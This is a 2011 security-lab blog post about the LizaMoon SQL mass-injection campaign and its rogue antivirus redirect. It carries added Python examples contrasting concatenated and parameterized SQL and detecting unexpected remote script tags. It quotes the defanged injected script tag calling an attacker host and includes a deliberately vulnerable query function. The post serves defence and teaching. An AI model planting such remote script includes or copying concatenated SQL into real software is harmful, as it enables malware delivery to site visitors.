X-Labs
March 29, 2011

LizaMoon mass injection hits over 226,000 URLs (was 28,000)

Patrik Runald

Websense Security Labs and the Websense ThreatSeeker Network have identified a new malicious mass-injection campaign that we call LizaMoon. Websense customers are protected with the Advanced Classification Engine.
Updated information

We have updated information about the LizaMoon injection available here:

http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx
LizaMoon

The LizaMoon mass-injection is a SQL injection attack that inserts the following line into the code of the page:
<script src=hxxp://lizamoon.com/ur.php></script>
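
To show the injection surface the article refers to, here is an added Python example (not code from the original post or from Websense) contrasting a page lookup that builds its SQL by string concatenation with one that binds the value as a parameter. The table, its rows and the O'Reilly title are constructed for the example; the quote in that title is enough to show that with concatenation the caller's text is parsed as part of the statement, which is the property a mass-injection campaign relies on, while the bound parameter keeps the statement shape fixed whatever the value contains.

```python
import sqlite3

# Constructed sample content table, standing in for a CMS page store
# (not data from the original article).
SAMPLE_ROWS = [
    ("home", "<h1>Welcome</h1>"),
    ("O'Reilly", "<p>Book review</p>"),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (title TEXT, body TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def lookup_vulnerable(conn, title):
    """Builds the SQL by string concatenation: the caller's text becomes part
    of the statement, so a quote in it changes the statement itself."""
    sql = "SELECT body FROM pages WHERE title = '" + title + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, title):
    """Bound parameter: the driver passes the value separately from the SQL
    text, so the statement shape is fixed regardless of the value's content."""
    return conn.execute(
        "SELECT body FROM pages WHERE title = ?", (title,)
    ).fetchall()


def compare(title):
    """Run both lookups on a fresh database and report what each did.

    For the vulnerable lookup an OperationalError is the tell-tale sign that
    the input reached the SQL parser as syntax rather than as a value."""
    conn = make_db()
    try:
        vuln = lookup_vulnerable(conn, title)
        vuln_error = None
    except sqlite3.OperationalError as exc:
        vuln = None
        vuln_error = str(exc)
    safe = lookup_parameterized(conn, title)
    conn.close()
    return {
        "vulnerable": vuln,
        "vulnerable_error": vuln_error,
        "parameterized": safe,
    }


if __name__ == "__main__":
    for t in ["home", "O'Reilly"]:
        print(t, "->", compare(t))
```

The syntax error from the concatenated version is the defender's signal: any value that can alter the statement's structure can also be used to alter what the statement does, which is why parameter binding (or a query builder that does the binding) is the fix rather than quote-stripping.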
According to a Google Search, over 226,000 URLs have been compromised (our initial count was 28,000). This includes several iTunes URLs, as you can see below:
And here is the injected code at one of those iTunes URLs:
The way iTunes works is that it downloads RSS/XML feeds from the publisher to update the podcast and list of available episodes. We believe that these RSS/XML feeds have been compromised with the injected code. The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer. So good job, Apple. 
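
As an added example (not from the original post, nor from Apple or Websense), the following Python shows both halves of the point above: a feed description carrying the injected line is embedded into a page with and without entity-encoding, and a check built on Python's HTML parser reports which script sources the page would actually load. The feed text, the page template and the allowlist of script hosts are constructed assumptions; the injected tag is the one quoted in the article, kept in its defanged hxxp form, and the check keys on the element rather than the scheme.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from. Assumed allowlist for the
# example; a real deployment would maintain its own.
ALLOWED_SCRIPT_HOSTS = {"cdn.example.com"}

# Constructed feed item, standing in for a podcast description pulled from a
# publisher's RSS/XML feed. The injected line is the one quoted in the
# article, kept in its defanged hxxp form.
FEED_DESCRIPTION = (
    "Episode 12: interview with the author."
    "<script src=hxxp://lizamoon.com/ur.php></script>"
)

# Constructed page template; the feed text lands inside the desc div.
PAGE_TEMPLATE = (
    "<html><body><h1>Podcast</h1>"
    '<script src="https://cdn.example.com/app.js"></script>'
    '<div class="desc">{desc}</div>'
    "</body></html>"
)


def render_item(description, escape_untrusted):
    """Embed feed text into the page. With escape_untrusted=True the feed
    text is entity-encoded first (what the article credits iTunes with
    doing), so any markup it carries becomes visible text, not elements."""
    desc = html.escape(description) if escape_untrusted else description
    return PAGE_TEMPLATE.format(desc=desc)


class ScriptSrcCollector(HTMLParser):
    """Records the src attribute of every <script> element the parser sees."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.sources.append(value)


def script_sources(markup):
    """All script src values that an HTML parser would actually honour.
    Entity-encoded tags never reach handle_starttag, so they are not listed."""
    collector = ScriptSrcCollector()
    collector.feed(markup)
    collector.close()
    return collector.sources


def suspicious_script_sources(markup, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Script sources pointing at hosts outside the allowlist: the signature
    of a mass-injection campaign is an unexpected remote <script src=...>."""
    flagged = []
    for src in script_sources(markup):
        host = urlparse(src).hostname
        if host is None:
            continue  # relative URL: served from this site, not a remote include
        if host.lower() not in allowed_hosts:
            flagged.append(src)
    return flagged


if __name__ == "__main__":
    raw = render_item(FEED_DESCRIPTION, escape_untrusted=False)
    safe = render_item(FEED_DESCRIPTION, escape_untrusted=True)
    print("raw feed text     ->", suspicious_script_sources(raw))
    print("escaped feed text ->", suspicious_script_sources(safe))
```

The same collector can be run over stored CMS content or freshly fetched feeds to spot a remote include that nobody added on purpose; the allowlist is what turns "there is a script tag" into "there is a script tag we did not expect".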

The URL that is injected is unavailable right now, but the server is still up and running, so that could change at any time. While it was up, the script contained simple JavaScript code that redirected the user to a well-known Rogue AV site: hxxp://defender-uqko.in. That site is also unavailable right now, so we don't have the actual binary analysis information available yet.

The domain lizamoon.com was registered three days ago with clearly fake information: 
We'll keep monitoring this mass-injection attack and provide updated information as it's available.
UPDATE1: A Google Search now returns over 226,000 results. Do note that this is a count of unique URLs, not infected hosts. Still, it makes it one of the bigger mass-injection attacks we have ever seen. 
UPDATE2: We have been monitoring the attack since it started and have noticed that the number of compromised URLs is still increasing, 380,000 URLs so far. Moreover, more domains besides lizamoon.com are now involved.
